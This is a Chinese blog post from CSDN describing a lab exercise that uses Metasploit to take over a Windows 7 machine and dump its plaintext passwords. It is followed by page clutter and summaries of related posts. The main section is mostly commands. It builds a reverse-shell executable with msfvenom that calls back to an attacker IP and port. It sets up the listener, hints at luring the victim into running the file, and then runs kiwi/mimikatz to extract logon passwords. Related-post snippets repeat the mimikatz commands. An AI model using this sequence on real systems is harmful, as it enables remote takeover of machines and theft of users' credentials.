meterpreter下抓取windows系统明文密码实验

最新推荐文章于 2025-04-03 18:09:11 发布

Feng_Blue_

最新推荐文章于 2025-04-03 18:09:11 发布

阅读量4.8k

点赞数 1

文章标签： windows 安全

本文链接：https://blog.csdn.net/Feng_Blue_/article/details/121150585

版权

虚拟机：kali | Win7

工具：msf

1.生成工具
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.40.140 lport=55555 -f exe -o 233.exe
这里需要注意的是IP地址以及端口。

2.监听

启动msf，选择模块，配置信息，监听。
msf6 > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.40.140
set LPORT 55555

3.运行程序

（这里可以采用各种方法去诱导Win7的操作人员去点击，这里就不在赘述。这里在win7界面直接运行。）

4. 目的

meterpreter > load kiwi

meterpreter > kiwi_cmd privilege::debug

meterpreter > kiwi_cmd sekurlsa::logonPasswords

本文仅提供于学术探讨。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Feng_Blue_

关注关注

1
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

后渗透之meterpreter学习笔记

迷风小白

11-08

8086

0x00 前言由于最近想学习关于内网渗透的一些知识，前面也有师傅写了关于meterpreter的使用攻略，我这里就来复现学习一下。 Meterpreter是Metasploit框架中的一个扩展模块，作为后渗透阶段的利器，其强大之处可想而知，我这里就简单介绍一下常用命令。 0x01 系统命令基本系统命令 background # 将当前会话放置后台 sessions # sessions...

win10及win2012之后系统的明文抓取方式

聚鼎安全

03-29

3739

原文地址：https://www.anquanke.com/post/id/175364 抓取明文：手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码 1.procdump+mimikatz获取win10/win2012 R2用户明文密码测试环境：win10企业版和win2012 R2 版本工具下载：链接：https://pan.baidu.c...

参与评论您还未登录，请先登录后发表或查看评论

mimikatz 抓取 Windows 明文密码

06-02

Mimikatz - Windows 密码抓取神器轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码！这个神器的功能肯定不仅仅如此在我看来它更像一个轻量级调试器可以提升进程权限注入进程读取

【内网安全】——meterpreter使用攻略

最新发布

qq_41701460的博客

04-03

1264

原贴在这：https://blog.csdn.net/qq_63844103/article/details/128815533。

meterpreter中使用mimikatz获取windows密码

浅笑996的博客

07-01

4380

进去meterpreter后getuid一下这获得系统管理员权限开始加载mimikatz模块 load mimikatz 加载成功. 第一种方法：获取登录密码的hash值 msv 上面已经是得到hash值了. 下面算明文密码. 获取明文密码 kerberos look...拿到登录的明文密码了. 第二种方法：使用另一种方式获取哈希值 mimikatz_command -f samdump::hashes 根据上面的方式获取明文密码 ...

kali meterpreter中mimikatz模块获取密码

子曰小玖的博客

04-30

2346

kali这方面不说了,meterpreter也略过, 做个关于mimikatz的笔记. mimikatz模块, 能获取对方机器的密码(包括哈希和明文). 渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010 进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下大部分情况下是拥有 system权限,无需 get sy...

Metapsloit后渗透Windows攻击(亲测metepreter使用教程)

wanqianshao的博客

04-02

6329

Meterpreter是什么？在Metasploit Framework中，Meterpreter是一种后渗透工具，它属于一种在运行过程中可通过网络进行功能扩展的动态可扩展型Payload。这种工具是基于“内存DLL注入”理念实现的，它能够通过创建一个新进程并调用注入的DLL来让目标系统运行注入的DLL文件。如何进入meterpreter？实验环境： kali metasploit 192.168.31.135 windows7 192.168.31.160 实验步骤： msfvenom -

抓取内网Windows明文密码与hashdump抓取密文

M372109150的博客

05-01

510

msf远程控制实验，首先生成一个木马控制程序--mpf.exe，然后启用MSF攻击平台，再加载模块和选择payload，并且设置payload参数并且进行监听，提权，hashdump抓取hash值思考题：windows登录的明文密码，存储过程是怎么样的，密文存在哪个文件下，该文件是否可以打开，并且查看到密文我们通过hashdump 抓取出所有用户的密文，分为两个模块，为什么？这两个模块分别都代表什么为什么第一个模块永远是一样的aad3 这两个模块的加密算法有什么不同，如何加密的

抓取内网windows密码和利用hash横向及相关问题

vt_yjx的博客

04-20

510

因为mimikatz这个工具是利用了lsass.exe会把一份明文账号密码存到内存中，所以才能抓到，但是由于系统补丁才抓不到了。不过继续横向不需要明文密码，因为系统验证都是通过比对hash值的，而哈希值又是不可逆

蓝桥杯-网络安全比赛（6）模拟实验 Metasploit 控制并获取Windows 登录HASH、LM Hash和NTLM Hash密文解析

Superstacks超全栈

05-06

1190

计算机中的每个账号(如果是域服务器，则为域内的每个账号)的用户名和密码都存储在sam文件中，当计算机运行时，该文件对所有账号进行锁定，要。这是一个非常重要的设计原则，因为如果密码以明文形式存储，那么任何能够访问存储位置的人或程序都可以轻易地获取到密码，这显然是不安全的。在验证过程中，LSA可能会调用相应的验证程序包（如msv1_0.dll），对用户输入的信息进行处理，并与存储在SAM（安全账户管理器）数据库中的密钥进行对比。最后，winlogon进程对用户登录进行最后的处理，完成整个登录过程。

密码安全攻防技术精讲

GitChat

07-03

3321

课程介绍本课程内容将以作者亲身经历的事情为主，从技术的视野和攻防角度来剖析各种密码及其他技术对工作和个人生活的影响，将“高高在上”的技术拉进我们日常的生活中来。每一篇文章都是精挑细选的典型案例，背后都有真实故事和场景，以技术的方式来再现和还原。非技术专业读者可以通过这些文章来了解和预防各种涉及密码的攻击，从事技术工作的读者可以按照文章的搭建环境进行实战实践。由于篇幅有限，密码攻防涉及的技术非常...

永恒之蓝ms17-010漏洞利用（提取meterpreter权限获取shell，进入windows 远程操控主机）

热门推荐

qq_42527761的博客

07-19

1万+

最近在学习The-Hacker-Playbook-3这本书，书中介绍的红队的第一个核心工具：Metasploit 框架，尽管 Metasploit 框架从 2003 年开发的，但它现在仍然是一个非常棒的工具。有最初的开发者 H.D. Moore 和非常活跃的社区为它提供持续支持。这个社区的驱动的框架，拥有着所有最新的公开漏洞的利用、后渗透利用模块、辅助模块等等。对于红队项目，我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统，以获得我们的第一个内网 shell,或者

获取目标Windows密码方式总结

Kevin's Blog

11-10

1441

文章目录一、目的/需求二、MSF的mimikatz模块获取密码2.1 模块介绍2.2 前提条件2.3 操作方法2.3.1 权限提升（略）2.3.2 进程迁移2.3.3 获取哈希2.2.4 获取密码三、MSF的kiwi模块获取密码3.1 模块介绍3.2 操作方法3.2.1 获取密码一、目的/需求拿到victim的控制权限，需要远程登录victim的主机，这时需要获取对方的登录密码。二、MSF的mimikatz模块获取密码 2.1 模块介绍 1. 介绍： Mimikatz由法国人开发的轻量级调试工

优秀的Windows密码抓取工具

feiyu361的博客

08-23

1065

优秀的工具如下: 01 Mimikatz 简介: Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码，hash，PIN码和kerberos票证。mimikatz还可以执行哈希传递，票证传递或构建Golden票证项目地址：https://github.com/gentilkiwi/mimikatz/ 使用 cmd运行命令如下： mimikatz.exe # cmd命令执行启动程序 privilege::debug # 提升权限 sekurlsa::logonpas

渗透测试 ( 4 ) --- Meterpreter 命令详解

freeking101的博客

07-02

1万+

Meterpreter 是 Metasploit 框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.

metasploit（MSF）渗透超细解说 -- 小黑渗透工具

G_WEB_Xie的博客

05-18

2203

metasploit Framework（msf）里带数千个已知的软件漏洞，并保持持续更新，Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，采用Ruby语言编写。黑掉整个宇宙的称号！！！初心：记录msfconsole的渗透测试流程，以及每个流程点常用到的一些命令，其中还有一些不足的地方大家可以指出来，我会在本博客中添加补充，也会将大家的名字备注在补充的章节内！！一起加油 ^-^本章出后后续会出实战测试，也会将win和linux常用命令做一期更新。

Metasploit框架(3), meterpreter 常用命令, sniffer流量监听, portfwd端口转发, kiwi, Mimikatz密码破解

探测???

11-29

289

注意: kiwi模块同时支持32位和64位的系统，但是该模块默认是加载32位的系统，所以如果目标主机是64位系统的话，直接默认加载该模块会导致很多功能无法使用。所以如果目标系统是64位的，则必须先查看系统进程列表，然后将meterpreter进程迁移到一个64位程序的进程中，才能加载kiwi并且查看系统明文。